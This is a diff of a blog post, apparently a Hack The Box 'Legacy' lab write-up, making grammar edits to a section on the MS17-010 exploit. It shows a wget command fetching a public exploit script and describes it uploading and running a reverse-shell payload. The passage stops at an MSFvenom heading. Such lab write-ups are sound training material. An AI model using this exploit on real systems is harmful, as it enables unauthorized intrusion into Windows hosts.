ColdFusionX/ColdFusionX.github.io/_posts/2020-09-01-LegacyHTB.md

 ## MS17-010

-For MS17-010 exploit, we will use the [**code**](https://github.com/helviojunior/MS17-010) from **helviojunior** which is fork from **worawit/MS17-010** repo.
+For MS17-010 exploit, we will use the [**code**](https://github.com/helviojunior/MS17-010) from **helviojunior** which is a fork from **worawit/MS17-010** repo.

-We can download the exploit using the following command:
+We can download the exploit on our machine using the following command:

 ```shell
 wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py
 ```
-This exploit is pretty straight forward as it requires an reverse shell payload file which it uploads & executes on the target machine.
+This exploit is pretty straight forward as it just requires an reverse shell payload file which it uploads & executes on the target machine.

-### Generating payload with MSFvenom:
+### Generating payload with MSFvenom

 ```shell
 cfx:  ~/Documents/htb/legacy/MS17-010